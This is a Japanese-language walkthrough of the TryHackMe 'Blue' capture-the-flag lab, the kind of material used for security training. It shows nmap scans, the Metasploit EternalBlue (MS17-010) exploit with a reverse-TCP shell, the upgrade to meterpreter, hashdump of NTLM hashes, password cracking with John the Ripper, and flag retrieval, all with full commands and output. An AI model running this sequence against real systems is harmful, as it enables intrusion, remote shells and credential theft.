TryHackMeのBlueのwriteupおよびメモ。
Task 1: Recon
How many ports are open with a port number under 1000?
nmap -Pn -p 0-1000 10.10.235.14┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ nmap -Pn -p 0-1000 10.10.235.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-13 08:41 EDT
Nmap scan report for 10.10.235.14
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds答えは3。
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
nmap -A 10.10.235.14┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ nmap -A 10.10.235.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-13 08:47 EDT
Nmap scan report for 10.10.235.14
Host is up (0.19s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2024-03-13T12:50:26+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2024-03-12T12:38:34
|_Not valid after: 2024-09-11T12:38:34
|_ssl-date: 2024-03-13T12:50:31+00:00; -1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:98:24:56:55:e9 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-03-13T07:50:26-05:00
| smb2-time:
| date: 2024-03-13T12:50:26
|_ start_date: 2024-03-13T12:38:33
|_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.61 seconds上記のnmapのスキャン結果より、標的マシンのOSのバージョンは Windows 7でプロダクトのバージョンは6.1.7601と判明した。
プロダクト・バージョンをググってみたところ、MS17-010 (Eternal Blue exploit) にたどり着いた。
Task 2: Gain Access
Start Metasploit. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
msfconsole
search MS17-010msf6 > search MS17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce答えはexploit/windows/smb/ms17_010_eternalblue。
Show options and set the one required value. What is the name of this value? (All caps for submission)
use 0
show optionsmsf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.74.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.答えはRHOSTS。
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: set payload windows/x64/shell/reverse_tcp With that done, run the exploit!
OpenVPNを介して自前のマシンから標的マシンにアクセスしている場合は、tun0インターフェイスに割り振られているIPアドレスをlhostに指定する必要がある。これをしないと標的マシンとのシェルが起動しなかった。
tun0に割り振られているIPアドレスを確認するにはifconfigコマンドを打つか、http://10.10.10.10/をブラウズすればよい。
Eternal Blue exploitを利用して標的マシンとシェルを張るには、Metasploitを起動して以下のコマンドを打つ。
search MS17-010
use 0
set payload windows/x64/shell/reverse_tcp
set rhosts <target IP>
set lhost <your tun0 IP>
exploitConfirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.9.221.71:4444
[*] 10.10.69.132:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.69.132:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.69.132:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.69.132:445 - The target is vulnerable.
[*] 10.10.69.132:445 - Connecting to target for exploitation.
[+] 10.10.69.132:445 - Connection established for exploitation.
[+] 10.10.69.132:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.69.132:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.69.132:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.69.132:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.69.132:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.69.132:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.69.132:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.69.132:445 - Sending all but last fragment of exploit packet
[*] 10.10.69.132:445 - Starting non-paged pool grooming
[+] 10.10.69.132:445 - Sending SMBv2 buffers
[+] 10.10.69.132:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.69.132:445 - Sending final SMBv2 buffers.
[*] 10.10.69.132:445 - Sending last fragment of exploit packet!
[*] 10.10.69.132:445 - Receiving response from exploit packet
[+] 10.10.69.132:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.69.132:445 - Sending egg to corrupted connection.
[*] 10.10.69.132:445 - Triggering free of corrupted buffer.
[-] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.69.132:445 - Connecting to target for exploitation.
[+] 10.10.69.132:445 - Connection established for exploitation.
[+] 10.10.69.132:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.69.132:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.69.132:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.69.132:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.69.132:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.69.132:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.69.132:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.69.132:445 - Sending all but last fragment of exploit packet
[*] 10.10.69.132:445 - Starting non-paged pool grooming
[+] 10.10.69.132:445 - Sending SMBv2 buffers
[+] 10.10.69.132:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.69.132:445 - Sending final SMBv2 buffers.
[*] 10.10.69.132:445 - Sending last fragment of exploit packet!
[*] 10.10.69.132:445 - Receiving response from exploit packet
[+] 10.10.69.132:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.69.132:445 - Sending egg to corrupted connection.
[*] 10.10.69.132:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.69.132
[*] Command shell session 1 opened (10.9.221.71:4444 -> 10.10.69.132:49169) at 2024-03-16 08:56:18 -0400
[+] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.69.132:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>whoami
whoami
nt authority\system
もし一発でシェルが起動しない場合は、再度exploitコマンドを実行するなり、標的マシンのVMを再起動するなりする必要がある。
Task 3: Escalate
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
search shell_to_meterpretermsf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter答えはpost/multi/manage/shell_to_meterpreter。
※参考
Select this (use MODULE_PATH). Show options, what option are we required to change?
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connec
tion
LHOST no IP of host that will receive the connection from the
payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on答えはSESSION。
Set the required option, you may need to list all of the sessions to find your target here.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windo 10.10.50.80:4444 -> 10.10.136
ws [Version 6.1.7601] ----- .150:49176 (10.10.136.150)
msf6 post(multi/manage/shell_to_meterpreter) >
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > Run! If this doesn't work, try completing the exploit from the previous task once more.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.50.80:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (200774 bytes) to 10.10.136.150
[*] Meterpreter session 2 opened (10.10.50.80:4433 -> 10.10.136.150:49192) at 2024-03-15 12:21:10 +0000
[*] Stopping exploit/multi/handler
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Wi 10.10.50.80:4444 -> 10.10.
ndows [Version 6.1.7601] - 136.150:49176 (10.10.136.1
---- 50)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON- 10.10.50.80:4433 -> 10.10.
PC 136.150:49192 (10.10.136.1
50)
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
[-] Already running as SYSTEMList all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Proces
s]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\sm
ss.exe
428 712 svchost.exe x64 0 NT AUTHORITY\SYSTEM
488 712 svchost.exe x64 0 NT AUTHORITY\SYSTEM
564 556 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csr
ss.exe
612 556 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\win
init.exe
624 604 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csr
ss.exe
664 604 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\win
logon.exe
712 612 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ser
vices.exe
720 612 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsa
ss.exe
728 612 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm
.exe
800 564 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\con
host.exe
836 712 svchost.exe x64 0 NT AUTHORITY\SYSTEM
904 712 svchost.exe x64 0 NT AUTHORITY\NETWORK S
ERVICE
952 712 svchost.exe x64 0 NT AUTHORITY\LOCAL SER
VICE
1020 664 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\Log
onUI.exe
1080 712 svchost.exe x64 0 NT AUTHORITY\LOCAL SER
VICE
1164 712 svchost.exe x64 0 NT AUTHORITY\NETWORK S
ERVICE
1312 712 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spo
olsv.exe
1348 712 svchost.exe x64 0 NT AUTHORITY\LOCAL SER
VICE
1408 712 TrustedInstall x64 0 NT AUTHORITY\SYSTEM
er.exe
1412 712 amazon-ssm-age x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon
nt.exe \SSM\amazon-ssm-agent.e
xe
1488 712 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon
\XenTools\LiteAgent.exe
1648 712 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon
\Ec2ConfigService\Ec2Co
nfig.exe
1916 3048 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\Win
dowsPowerShell\v1.0\pow
ershell.exe
1960 712 svchost.exe x64 0 NT AUTHORITY\NETWORK S
ERVICE
2172 836 WmiPrvSE.exe
2424 712 svchost.exe x64 0 NT AUTHORITY\LOCAL SER
VICE
2548 712 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2560 712 sppsvc.exe x64 0 NT AUTHORITY\NETWORK S
ERVICE
2628 712 vds.exe x64 0 NT AUTHORITY\SYSTEM
2776 712 SearchIndexer. x64 0 NT AUTHORITY\SYSTEM
exe
2868 564 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\con
host.exe
2924 1312 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd
.exe
meterpreter > Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
上記のプロセス一覧より、amazon-ssm-agent.exe (PID: 1412) を選択。
meterpreter > migrate 1412
[*] Migrating from 1916 to 1412...
[*] Migration completed successfully.
meterpreter > Task 4: Cracking
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter > 答えはJon。
Copy this password hash to a file and research how to crack it. What is the cracked password?
窃取したハッシュをファイルに保存。
$ cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
続いて、--wordlist以外のオプションなしでJohn The Ripperを実行してみた。
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txtすると、--format=NT オプションを使えと言われた。
┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/kali/.john
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (LM [DES 128/128 AVX])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
1g 0:00:00:00 DONE (2024-03-15 08:44) 50.00g/s 1228Kp/s 1228Kc/s 1228KC/s 123456..010986
Warning: passwords printed above might not be all those cracked
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed. --format=NT オプションを加えて、再度John The Ripperを実行してみたところ、パスワードが無事クラックされた。
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT┌──(kali㉿kali)-[~/Documents/TryHackMe/Blue]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
alqfna22 (Jon)
2g 0:00:00:00 DONE (2024-03-15 08:46) 3.448g/s 17586Kp/s 17586Kc/s 17595KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 答えはalqfna22。
Task 5: Find flags!
Flag1? This flag can be found at the system root.
システムのルート・ディレクトリにフラグがあるとのことなので、C:\を覗いてみた。
meterpreter > dir "C:"
Listing: C:
===========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 03:13:36 +0000 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 06:08:56 +0100 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 04:20:08 +0100 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-03-17 22:22:01 +0000 Program Files
040555/r-xr-xr-x 4096 dir 2019-03-17 22:28:38 +0000 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-03-17 22:35:57 +0000 ProgramData
040777/rwxrwxrwx 0 dir 2018-12-13 03:13:22 +0000 Recovery
040777/rwxrwxrwx 4096 dir 2024-03-15 12:41:37 +0000 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-12-13 03:13:28 +0000 Users
040777/rwxrwxrwx 16384 dir 2019-03-17 22:36:30 +0000 Windows
100666/rw-rw-rw- 24 fil 2019-03-17 19:27:21 +0000 flag1.txt
000000/--------- 0 fif 1970-01-01 01:00:00 +0100 hiberfil.sys
000000/--------- 0 fif 1970-01-01 01:00:00 +0100 pagefile.sysflag1.txtを発見した。この中にフラグが記載されていた。
meterpreter > cat "C:\flag1.txt"
flag{access_the_<REDACTED>}Flag2? This flag can be found at the location where passwords are stored within Windows.
*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
C:\Windows\System32\Configにflag2.txtを発見した。この中にフラグが記載されていた。
meterpreter > dir "C:\Windows\System32\Config\flag2.txt"
100666/rw-rw-rw- 34 fil 2019-03-17 19:32:48 +0000 C:\Windows\System32\Config\flag2.txt
meterpreter > cat "C:\Windows\System32\Config\flag2.txt"
flag{sam_database_<REDACTED>}flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
meterpreterのシェルを抜けて、Windowsコマンドプロンプト上で、以下のコマンドを打ってflag3.txtというファイルを探してみた。
dir “\flag3.txt” /sC:\Windows\system32>dir "\flag3.txt" /s
dir "\flag3.txt" /s
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
Total Files Listed:
1 File(s) 37 bytes
0 Dir(s) 21,064,400,896 bytes freeC:\Users\Jon\Documentsにflag3.txtを発見した。この中にフラグが記載されていた。
C:\Windows\system32>type C:\Users\Jon\Documents\flag3.txt
type C:\Users\Jon\Documents\flag3.txt
flag{admin_documents_can_be_valuable}